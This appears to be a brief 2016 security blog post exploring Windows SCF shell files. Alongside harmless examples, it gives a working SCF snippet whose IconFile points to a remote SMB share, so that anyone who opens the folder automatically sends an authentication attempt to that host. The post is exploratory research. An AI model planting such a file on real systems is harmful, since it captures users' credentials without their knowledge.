SMB/HTTP Auth Capture via SCF File
Published: 14 Jun 2016 - 07:35 -0500
Recently saw a link to an SCF file. Didn’t know what those were so I went digging. Turns out they are a simple text based file that controls Windows Explorer. ;-)
Here are the examples I found via the references:
[Shell] Command = 2 IconFile = explorer.exe, 1 [Taskbar] Command = Explorer
Open “Channels” page in IE:
[Shell] Command=3 IconFile=shdocvw.dll,-118 [IE] Command=Channels
This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.
Minimize all windows:
[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop
My first attempt to utilize this file format for fun was of course to just set the IconFile to an SMB share:
[Shell] Command=2 IconFile=\\192.168.1.101\share\test.ico [Taskbar] Command=ToggleDesktop
and that worked as expected, every time the share was opened, whoever opened that folder it automatically attempted to authenticate to the share that I specified. Lots easier than writing an LNK file.
My gut is telling me there is more to this file format than meets the eye, especially when there are malware writers using it as well. I haven’t been able to get my hands on one to see what they are doing inside the file, but I assume it’s not just to minimize all windows.
There are some hints that you can invoke COM objects.. who knows…